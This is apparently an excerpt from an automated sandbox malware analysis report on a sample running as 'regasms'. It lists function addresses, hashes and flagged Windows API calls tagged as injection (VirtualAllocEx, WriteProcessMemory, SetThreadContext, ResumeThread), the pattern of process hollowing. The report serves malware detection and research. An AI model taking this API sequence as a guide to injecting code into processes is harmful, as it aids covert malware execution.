                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: c8219a11ae1c0e5cd8830bb6fb56df641d0247739b5e05d5e3ff002a06ca0257
                                  • Instruction ID: ee39af59e88a8930731c704ca66a6291c561a05f095ba3aa7dc47a713b50eb3a
                                  • Opcode Fuzzy Hash: c8219a11ae1c0e5cd8830bb6fb56df641d0247739b5e05d5e3ff002a06ca0257
                                  • Instruction Fuzzy Hash: 3141DEB1C00719CFEB25DFAAC884BCEBBB5AF49304F60805AE509AB251DB75594ACF50
                                  Function 02F844B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 02F859C9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 7f1c94d1fc881711a067825c36ceb66798f53edb36239e623962abe17c294212
                                  • Instruction ID: 5f5333d91d0b6f23b5c4ff368110e8209f115cfaf2ea5b25bc0c8b8e1d213a25
                                  • Opcode Fuzzy Hash: 7f1c94d1fc881711a067825c36ceb66798f53edb36239e623962abe17c294212
                                  • Instruction Fuzzy Hash: E841E171C0071DCBEB25DFAAC88478EBBB5BF48344F60805AD509AB251D7755949CF90
                                  Function 07DD5A59 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07DD5AF0
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 746ff7373879222b2de0689a2ad0fda0a342c9d29205be791f3eaceb08c8fbc7
                                  • Instruction ID: 1e1225e10d6850c62217fb3413c7dfce6473ba3902dff4a49f545dc0ef5ceb13
                                  • Opcode Fuzzy Hash: 746ff7373879222b2de0689a2ad0fda0a342c9d29205be791f3eaceb08c8fbc7
                                  • Instruction Fuzzy Hash: FB2135B1900359DFDB10CFAAD884BDEBBF4FF48310F10842AE959A7240D778A954CBA4
                                  Function 07DD5A60 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07DD5AF0
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 9f0088a19a0c0e7eecb54fd2ed7b2ceafa249cf8173389f738304ba4a872f181
                                  • Instruction ID: 700d62c8f7af97bbe1caeb93344fb58c8bd9c58278d0a82f9112c83c0fd15d64
                                  • Opcode Fuzzy Hash: 9f0088a19a0c0e7eecb54fd2ed7b2ceafa249cf8173389f738304ba4a872f181
                                  • Instruction Fuzzy Hash: E82127B59003599FDB10CFAAC981BDEBBF5FF48310F10842AE919A7240D778A954CBA5
                                  Function 07DD58C0 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07DD5946
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 08943a9228ee2170281c42170ee32b6947b1a112117183152b7d127f94299aa4
                                  • Instruction ID: 2f74aa7688cdf30a57b07ad33e971af4f9042ef820c7cd0bdb824a77ed005b42
                                  • Opcode Fuzzy Hash: 08943a9228ee2170281c42170ee32b6947b1a112117183152b7d127f94299aa4
                                  • Instruction Fuzzy Hash: BF214AB19003098FDB10CFAAC4447EEFBF5EF48220F10842AD559A7280DB789945CFA5
                                  Function 07DD5B48 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07DD5BD0
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: c8087472c75183cf5b8a29c8616cb1498e1ec10e5fd1d4ad0cf78172ad6ada20
                                  • Instruction ID: 59567cff185471953afd9159da0ab67aad1013b7ac5145c91491a5c369c4b53c
                                  • Opcode Fuzzy Hash: c8087472c75183cf5b8a29c8616cb1498e1ec10e5fd1d4ad0cf78172ad6ada20
                                  • Instruction Fuzzy Hash: 6421F4B18003599FDB10DFAAD840BEEFBF5FF48310F10842AE559A7240CB7999558BA5
                                  Function 02F8D7C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F8D84F
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: b59ff0bd32b93b59d63ccb08bf82bab7da0cd468e7477631f2bab3e48305a8b3
                                  • Instruction ID: 0ed078aee74d177f9b0d5b908b7acaafa8ac09792b435cee996b99e90ef77ed8
                                  • Opcode Fuzzy Hash: b59ff0bd32b93b59d63ccb08bf82bab7da0cd468e7477631f2bab3e48305a8b3
                                  • Instruction Fuzzy Hash: BD21FFB5D00248EFDB10CFAAD984AEEBBF4EF08310F14805AE958A7650C338A941CF60
                                  Function 07DD5B50 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07DD5BD0
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: d729f1c51348b6ded732b4585ce757023861ad79e8ac22ab2656e980fe90532f
                                  • Instruction ID: 320cca5e8f9104044457f908e213902b6f48a32a56562018790d2ca38cb886cb
                                  • Opcode Fuzzy Hash: d729f1c51348b6ded732b4585ce757023861ad79e8ac22ab2656e980fe90532f
                                  • Instruction Fuzzy Hash: 952103B18003499FDB10CFAAD880BEEFBF5FF48310F10842AE919A7240C77999518BA5
                                  Function 07DD58C8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07DD5946
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 1dca36bff23c9d7f594af936f8194b01ea0da4727ef455e2767780a9fb33b9d3
                                  • Instruction ID: 33d0f790d58562a0ff46f8f1c1e40bf3686e52fb6fa0b8dce64917b8b6ecd465
                                  • Opcode Fuzzy Hash: 1dca36bff23c9d7f594af936f8194b01ea0da4727ef455e2767780a9fb33b9d3
                                  • Instruction Fuzzy Hash: 122132B1D003098FDB14DFAAC484BEEFBF5EF48220F14842AD559A7240CB78A945CBA5
                                  Function 02F8D7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F8D84F
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: aff30dc9824dca30f09af736a7ac6ecfacbf18f7b79e7f32b4e1b21149e0d8b4
                                  • Instruction ID: 1660f8e0d296411ca4a233c43586895b839605081d1dce2ec417aa6023830494
                                  • Opcode Fuzzy Hash: aff30dc9824dca30f09af736a7ac6ecfacbf18f7b79e7f32b4e1b21149e0d8b4
                                  • Instruction Fuzzy Hash: EE21B3B5D00248DFDB10CFAAD984ADEFBF4EB48310F14845AE918A7350D379A944CF65
                                  Function 07DD5998 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07DD5A0E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 115084db0ec3f07ef12525dc25c13a77a5d100360e38f53652e4b2a8ff4c2131
                                  • Instruction ID: 8e81c879cd65a0d723b978a555cb81a55c08cb74f1cff9e5b2b5a72053f001d3
                                  • Opcode Fuzzy Hash: 115084db0ec3f07ef12525dc25c13a77a5d100360e38f53652e4b2a8ff4c2131
                                  • Instruction Fuzzy Hash: B72167728003499FDB20CFAAD840BDEFBF5EF48320F14881AE915A7640CB75A940CBA0
                                  Function 07DD5811 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: be24c081f695daf960539f334d4ac2e45fa258a8383011dffd1dfa3ca3d72a36
                                  • Instruction ID: ba9d1843e3decf85a4723345de73e61e26a36f6a9400c341ba206d1c10671992
                                  • Opcode Fuzzy Hash: be24c081f695daf960539f334d4ac2e45fa258a8383011dffd1dfa3ca3d72a36
                                  • Instruction Fuzzy Hash: 591153B18003498FDB24CFAAC4447EEFBF4EF88320F24841AD419A7640CB39A9408B95
                                  Function 07DD59A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07DD5A0E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: d40ea28ec8ddb06566f7b4e6baaf70a50a5c3632304b0185299475102fdea61a
                                  • Instruction ID: b0937065dd3af4d5eca68d935c64b029ba2e79fe27d2171f86dd7b0c1ffe7e1a
                                  • Opcode Fuzzy Hash: d40ea28ec8ddb06566f7b4e6baaf70a50a5c3632304b0185299475102fdea61a
                                  • Instruction Fuzzy Hash: FE1156728003499FDB20CFAAC844BDEFBF5EF48310F10881AE515A7250CB75A940CBA0
                                  Function 07DD5818 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: b42f92a299c811d52aaedc4a74d71110f0c8f8c65e024f29c92bfca6153bec95
                                  • Instruction ID: d6330d5199793b4d72e2f4d0152ab781af79a305b2eb42c1677545d276f27802
                                  • Opcode Fuzzy Hash: b42f92a299c811d52aaedc4a74d71110f0c8f8c65e024f29c92bfca6153bec95
                                  • Instruction Fuzzy Hash: 071125B1D003498FDB24DFAAD4447EEFBF4EB88320F24841AD519A7640CA79A945CBA5
                                  Function 02F8B500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02F8B566
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: feef6ca4bbb9e7adddb6e96196b08586df99817b494390a7438f2ce3cf0acb6e
                                  • Instruction ID: 7e46416da90a7738f084faa775fd9bf22bb9b1b7a3f9e0216c1d8d51eb99b680
                                  • Opcode Fuzzy Hash: feef6ca4bbb9e7adddb6e96196b08586df99817b494390a7438f2ce3cf0acb6e
                                  • Instruction Fuzzy Hash: BD110FB6C002498FDB20DF9AC444ADEFBF4EB88314F10841AD519AB710C379A545CFA5
                                  Function 07DD931B Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07DD937D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 72f73e2c9d0cf5d3bc669e2e307d2db5c4fcaab43f5d147f4fa5d44292a3859f
                                  • Instruction ID: fb78466288bf61f0e244f7cd3bc868fee9819f356f7c13471c9f549c7d586d96
                                  • Opcode Fuzzy Hash: 72f73e2c9d0cf5d3bc669e2e307d2db5c4fcaab43f5d147f4fa5d44292a3859f
                                  • Instruction Fuzzy Hash: 4011F5B5800349DFDB10DF9AD845BDEFBF8EB48310F20841AE558A7640C375A944CFA1
                                  Function 07DD26D4 Relevance: 1.5, APIs: 1, Instructions: 39windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07DD937D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 30d0038dbd0d9b3705596e59725e3bc7b0cfc14e4b7e793e0caf84e6c464a47c
                                  • Instruction ID: 63b3fd39a69953f87b60a0ff281b6b94b4291d76dfa4e97c8af6610141e96e00
                                  • Opcode Fuzzy Hash: 30d0038dbd0d9b3705596e59725e3bc7b0cfc14e4b7e793e0caf84e6c464a47c
                                  • Instruction Fuzzy Hash: 4301C2B48007499FDB10DF9AC589B9EBBF8EB09310F108419E559A7750C3B9A984CFA5
                                  Function 07B12D88 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (q
                                  • API String ID: 0-2414175341
                                  • Opcode ID: 6f9bc62dc3a218d5c0a387a7df58537b07cf54ae8a687e696221bca5af8bd537
                                  • Instruction ID: adca1e01e5a0da3f89715decfb1df1817bae9491db6f4d7e7cd531a907f660f7
                                  • Opcode Fuzzy Hash: 6f9bc62dc3a218d5c0a387a7df58537b07cf54ae8a687e696221bca5af8bd537
                                  • Instruction Fuzzy Hash: E261D4B1B002069FEB259F65D854BAFBBE6FF88240F54846AE90697390DB349D41CB90
                                  Function 07B1778F Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0,Gq
                                  • API String ID: 0-2013397073
                                  • Opcode ID: 0cacfcdfc7b562e62dac1d4f1d2caf859968d36f0723504749e43ad17b3fe2fa
                                  • Instruction ID: 5817e6cc72b29e4e25fdbcdf302fa5dea917b89c5195ede8795643e262155a4d
                                  • Opcode Fuzzy Hash: 0cacfcdfc7b562e62dac1d4f1d2caf859968d36f0723504749e43ad17b3fe2fa
                                  • Instruction Fuzzy Hash: 9C71E434B042449FE710AB78D455A9EBBB2FF89300F0585EAD8859F396CB706D46C7D2
                                  Function 07B1ED18 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Teq
                                  • API String ID: 0-1098410595
                                  • Opcode ID: 666050f5c5665f1d2407afab971df17a29bf48dbf60b2c189d3f4afaa08fe1b7
                                  • Instruction ID: 73cbe2f10e0af86ddd996273966de6aada79f053a0c340d3b1c63d6212359c01
                                  • Opcode Fuzzy Hash: 666050f5c5665f1d2407afab971df17a29bf48dbf60b2c189d3f4afaa08fe1b7
                                  • Instruction Fuzzy Hash: 7171F4B4E14209CFEB44CFA9C884AEEBBB6FF89301F54806AD919AB354D7309945CF50
                                  Function 07B177C8 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0,Gq
                                  • API String ID: 0-2013397073
                                  • Opcode ID: 69077779ba14f49fe3c86b537692e167263ba7aa5de73ab2602c3fe99db3d427
                                  • Instruction ID: 1f92ed99f4ec28c8331196e6accd26037d5bb5dce450d6182cef4c4d7007f1c4
                                  • Opcode Fuzzy Hash: 69077779ba14f49fe3c86b537692e167263ba7aa5de73ab2602c3fe99db3d427
                                  • Instruction Fuzzy Hash: 80619234F002059FE714AB68D455AAEB7B2FF88300F5485A9D9859F386CF706E46C7D2
                                  Function 07B10C2A Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: h
                                  • API String ID: 0-2439710439
                                  • Opcode ID: bbc51ba2306c66a266beffca0c94efb14889f9c3cecf79de074a72f875402c59
                                  • Instruction ID: 463e1d13172a6e8a957e85edb61ac1deef10326d9381a826758ad2801e6a655d
                                  • Opcode Fuzzy Hash: bbc51ba2306c66a266beffca0c94efb14889f9c3cecf79de074a72f875402c59
                                  • Instruction Fuzzy Hash: 144161B0A0060ACFDF10EFA4C8805ADF7B1FF89310B548699E816E7355EB34E985CB90
                                  Function 07B18E68 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q
                                  • API String ID: 0-1301096350
                                  • Opcode ID: c95306b04c63a7136c9844633ac0679570a4e99e80c9d9703897d68a36440fa4
                                  • Instruction ID: db186e41208937f0e3a1f6fed5f8ee38e3be106a262df7e8fca6cf57b0244ee8
                                  • Opcode Fuzzy Hash: c95306b04c63a7136c9844633ac0679570a4e99e80c9d9703897d68a36440fa4
                                  • Instruction Fuzzy Hash: 6011E1F291C281EFE321966494102767BA6BB47134F98C8EBD446CB182C33E884287A3
                                  Function 07B182C1 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q
                                  • API String ID: 0-1301096350
                                  • Opcode ID: 393177cc2c8294315b77fa7797d1a7ec94b67db2a43cec3846aaa6d7260581e0
                                  • Instruction ID: 8fe583bc1ddaf2c90457320cd4bcd2b23e48f442126d2fe40f727b3d57d5a096
                                  • Opcode Fuzzy Hash: 393177cc2c8294315b77fa7797d1a7ec94b67db2a43cec3846aaa6d7260581e0
                                  • Instruction Fuzzy Hash: 0D0181F0519642DFE3218B14E914764BBA6F707264FC883E6E84ACB242C7758984C7EA
                                  Function 07B16D20 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: G
                                  • API String ID: 0-985283518
                                  • Opcode ID: 8e232823a0192a2732082e9961aedad38d0e3e9ae0af8fb4465c858a41fdeaa4
                                  • Instruction ID: 116a284d974af9db39c8701fdbee8c296c5da5334799f8dc24c17f7014c56d71
                                  • Opcode Fuzzy Hash: 8e232823a0192a2732082e9961aedad38d0e3e9ae0af8fb4465c858a41fdeaa4
                                  • Instruction Fuzzy Hash: 70D05EF090D288EBD715CE91D9501A87BBA9B13219F8510C3D4098B642DF260F299793
                                  Function 07B16D30 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: G
                                  • API String ID: 0-985283518
                                  • Opcode ID: 22112509263fd768a65e91410fedb28d25b106c1676d023da72a9d999611b15a
                                  • Instruction ID: 16938894937e57310908f046359a6edec2f96d463266c1fedccccd55462d8b29
                                  • Opcode Fuzzy Hash: 22112509263fd768a65e91410fedb28d25b106c1676d023da72a9d999611b15a
                                  • Instruction Fuzzy Hash: B3C08CF050810CEBD704CF90D90563CB7BDD702309F8000C4D90E43600DF311F20AA82
                                  Function 07B13498 Relevance: .4, Instructions: 446COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04360da8d7328a823a82a72f928a01ef49b360665accf295c2ec8174aae4d3b8
                                  • Instruction ID: ab12d978ca13cd971afb2a302daf2db2622cf684917e5baf79e776ffb2216ff8
                                  • Opcode Fuzzy Hash: 04360da8d7328a823a82a72f928a01ef49b360665accf295c2ec8174aae4d3b8
                                  • Instruction Fuzzy Hash: 6ED1BFF0F0120ADFEB15AF68C4486AEBFF1EF46200F9544E9D446A7295FA31C865CB91
                                  Function 07B10480 Relevance: .3, Instructions: 332COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6fcae213b08c44036a406d7f6df4482735f846aaacdfda6ab893e9541b87ca65
                                  • Instruction ID: 3bc331714f5b074abbab79df43eb163230f3f013339e24c6360f8092b6505bda
                                  • Opcode Fuzzy Hash: 6fcae213b08c44036a406d7f6df4482735f846aaacdfda6ab893e9541b87ca65
                                  • Instruction Fuzzy Hash: 39F1C971D1061ACBDF10EFA8C894AEDB7B5FF49300F1086A9D549B7254EB70AA85CF90
                                  Function 07B10471 Relevance: .3, Instructions: 306COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54aa678cd424f07bc2c63ad48984f507d10d53581548ab65044a575e8df2fea2
                                  • Instruction ID: 33ef6c5453851d7c02b73476a5b928074e5a423318c86456dc7abc184e454d40
                                  • Opcode Fuzzy Hash: 54aa678cd424f07bc2c63ad48984f507d10d53581548ab65044a575e8df2fea2
                                  • Instruction Fuzzy Hash: B7E1D871D1061ACBDF10EFA8C9946EDB7B5FF48300F1086AAD549B7254EB70AA85CF90
                                  Function 07B14AB0 Relevance: .2, Instructions: 224COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb53937f0bd743cfe0da88f6076b90fb80609da8e702393e58cd32ae1b10cb09
                                  • Instruction ID: b8098cef9426678af93d23c0b3f004471c429199e65ff0328b2b1603a0501dac
                                  • Opcode Fuzzy Hash: bb53937f0bd743cfe0da88f6076b90fb80609da8e702393e58cd32ae1b10cb09
                                  • Instruction Fuzzy Hash: 8BA1D775910619DFDB10EF68C840A9DFBB1FF4A304F05C699E549BB215EB30AA89CF90
                                  Function 07B14AA1 Relevance: .2, Instructions: 174COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
